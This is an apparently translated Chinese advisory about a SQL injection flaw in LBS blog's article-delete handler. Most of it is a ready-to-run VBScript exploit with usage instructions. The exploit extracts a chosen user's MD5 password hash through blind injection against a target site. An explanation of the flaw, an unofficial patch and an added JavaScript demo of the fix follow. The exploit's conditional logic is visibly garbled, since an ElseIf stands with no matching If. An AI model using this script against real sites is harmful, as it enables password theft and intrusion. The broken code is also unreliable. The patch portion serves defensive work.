
LBS blog SQL injection vulnerability (affects all versions)


http://www.gipsky.com/
The exploit is as follows:

'============================================================================

'Usage:

' At the command prompt:

' cscript.exe lbsblog.vbs <blog path on the target site> <valid article id> <id of the blog user whose password is to be cracked>

' For example:

' cscript.exe lbsblog.vbs www.xxxx.com/blog/ 1 1

' by loveshell.net[B.C.T]

'============================================================================

On Error Resume Next

Dim oArgs

Dim olbsXML 'XMLHTTP object used to open the target URL

Dim TargetURL 'target URL

Dim userid,articleid 'blog user id and article id

Dim TempStr 'holds the part of the MD5 password hash recovered so far

Dim CharHex 'hexadecimal character set

Dim charset



Set oArgs = WScript.arguments

If oArgs.count < 1 Then Call ShowUsage()



Set olbsXML = createObject("Microsoft.XMLHTTP")



'Complete the target URL

TargetURL = oArgs(0)

If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL

If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/"

TargetURL=TargetURL & "article.asp"



articleid=oArgs(1)

userid=oArgs(2)

TempStr=""

CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")



WScript.echo "LBS blog All version Exploit"&vbcrlf

WScript.echo "By 剑心"&vbcrlf

WScript.echo "http://www.loveshell.net/ Just For fun :)"&vbcrlf&vbcrlf

WScript.echo " # # the site now"&vbcrlf



Call main(TargetURL,BlogName)



Set olbsXML = Nothing



'----------------------------------------------sub-------------------------------------------------------

'============================================

'Function name: main

'Purpose: main routine; uses the injection to recover the blog user's password hash

'============================================

Sub main(TargetURL,BlogName)

Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage

For MainOffset = 1 To 40

For SubOffset = 0 To 15

TempLen = 0

postdata = ""

postdata = articleid &" and (select left(user_password,"&MainOffset&") from blog_user where user_id=" & userid & ")='" & TempStr&CharHex(SubOffset) &"'"



OpenURL = TargetURL



olbsXML.open "Post",OpenURL, False, "", ""

olbsXML.setRequestHeader "Content-Type","application/x-www-form-urlencoded"

olbsXML.send "act=delete&id="& escape(postdata)

GetPage = BytesToBstr(olbsXML.ResponseBody)

'Check whether the requested page was reached

'"Blog user does not exist or the submitted data is wrong" is the error marker; when it is returned, the guessed MD5 character is incorrect

'If you end up with an MD5 value of 0000000000000000, change the error marker

ElseIf InStr(GetPage,"permission")<>0 Then

TempStr=TempStr & CharHex(SubOffset)

WScript.Echo " Crack now:"&TempStr

Exit for

Else

WScript.echo vbcrlf & "Something error" & vbcrlf

WScript.echo vbcrlf & GetPage& vbcrlf

WScript.Quit

End If

next

Next

WScript.Echo vbcrlf& " We Got It:" & TempStr & vbcrlf &vbcrlf&":P Don't Be evil"

End sub



'============================================

'Function name: BytesToBstr

'Purpose: convert the XMLHTTP response body into a GB2312-encoded string

'============================================

Function BytesToBstr(body)

dim objstream

set objstream = createObject("ADODB.Stream")

objstream.Type = 1

objstream.Mode =3

objstream.Open

objstream.Write body

objstream.Position = 0

objstream.Type = 2

objstream.Charset = "GB2312"

BytesToBstr = objstream.ReadText

objstream.Close

set objstream = nothing

End Function



'============================

'Function name: ShowUsage

'Purpose: print the usage message

'============================

Sub ShowUsage()

WScript.echo " LBS blog Exploit" & vbcrlf & " By Loveshell/剑心"

WScript.echo "Usage:"& vbcrlf & " CScript " & WScript.ScriptFullName &" TargetURL ArticleID UserID"

WScript.echo "Example:"& vbcrlf & " CScript " & WScript.ScriptFullName &" http://www.loveshell.net/ 1 1"

WScript.echo ""

WScript.Quit

End Sub



Vulnerability description:



In src_article.asp:

......

input["log_id"]=func.checkInt(input["log_id"]);

if(!input["id"]){

strError=lang["invalid_parameter"];

}else{

// Check if the article exists

theArticle.load("log_id, log_authorID, log_catID","log_id=" + input["id"]);

strError=false;

}

......



What gets filtered is log_id, but what is actually used is id, heh :)



And then?

The code in class/article.asp:

this.load = function(strselect, strwhere){

var tmpA=connBlog.query("select TOP 1 " + strselect + " FROM [blog_Article] where " + strwhere);

if(tmpA){

this.fill(tmpA[0]);

return true;

}else{

return false;

}

}



The above needs no explanation, heh. Triggering it does have a precondition though; let's see whether it can be met!

function articledelete(){

if(theUser.rights["delete"]<1){

// Check User Right - without DB Query

pageHeader(lang["error"]);

redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "(script removed)window.history.back();", false, "errorbox");

}else{

var theArticle=new lbsArticle();

var strError;

By default even guests have delete rights. Although a check is performed afterwards, the injection has already happened by then, and it is precisely that check we use to inject, heh.



Unofficial patch for the LBS blog SQL injection vulnerability

Open src_article.asp and find:



input["log_id"]=func.checkInt(input["log_id"]);

if(!input["id"]){

strError=lang["invalid_parameter"];

}else{

// Check if the article exists

theArticle.load("log_id, log_authorID, log_catID","log_id=" + input["id"]);

strError=false;

}

Change the line theArticle.load("log_id, log_authorID, log_catID","log_id=" + input["id"]);



to: theArticle.load("log_id, log_authorID, log_catID","log_id=" + func.checkInt(input["id"])); and that is all.
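The following is an added example, not code from LBS blog or from the author above. It models the src_article.asp lookup before and after the unofficial patch so the effect of validating `id` can be seen without a database. `checkInt` is an assumption about what LBS blog's func.checkInt does (accept only a whole number, otherwise return 0), and `loadSql` stands in for connBlog.query by returning the statement that would run. The patched version goes one step beyond the one-line patch: a value that checkInt reduces to 0 is reported as an invalid parameter instead of being queried as log_id=0.

```javascript
// Added example, not LBS blog's own code. `checkInt` is an assumed model of
// func.checkInt: accept only a whole number, otherwise return 0.
function checkInt(value) {
  if (typeof value === "number") return Number.isInteger(value) ? value : 0;
  if (typeof value !== "string") return 0;
  var trimmed = value.trim();
  return /^\d+$/.test(trimmed) ? parseInt(trimmed, 10) : 0;
}

// Stand-in for lbsArticle.load: instead of calling connBlog.query it returns
// the SQL text, built the same way class/article.asp builds it.
function loadSql(strselect, strwhere) {
  return "select TOP 1 " + strselect + " FROM [blog_Article] where " + strwhere;
}

// Before the patch: the raw request value is concatenated into the WHERE clause.
function deleteLookupVulnerable(input) {
  if (!input["id"]) return { error: "invalid_parameter", sql: null };
  return {
    error: false,
    sql: loadSql("log_id, log_authorID, log_catID", "log_id=" + input["id"])
  };
}

// After the patch: the value is reduced to an integer before it reaches the
// WHERE clause, and anything checkInt rejects is treated as an invalid parameter.
function deleteLookupPatched(input) {
  var id = checkInt(input["id"]);
  if (!id) return { error: "invalid_parameter", sql: null };
  return {
    error: false,
    sql: loadSql("log_id, log_authorID, log_catID", "log_id=" + id)
  };
}

// Constructed request values: a normal id and one carrying a trailing SQL condition.
var normalRequest = { id: "1" };
var taintedRequest = { id: "1 and 1=1" };

// Runs both lookups on both inputs and returns what each would send to the database.
function demo() {
  return {
    vulnerableNormal: deleteLookupVulnerable(normalRequest).sql,
    vulnerableTainted: deleteLookupVulnerable(taintedRequest).sql,
    patchedNormal: deleteLookupPatched(normalRequest).sql,
    patchedTainted: deleteLookupPatched(taintedRequest).error
  };
}

console.log(demo());
```

The point of the comparison is that the unpatched path forwards the extra condition verbatim into the statement, while the patched path never lets a non-integer value reach the query at all. Rejecting a zero result outright is a reasonable extra step because no real article has log_id 0, so a request that validates to 0 is itself a sign of a malformed or tampered parameter.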
Source: gipsky.com & 安信网络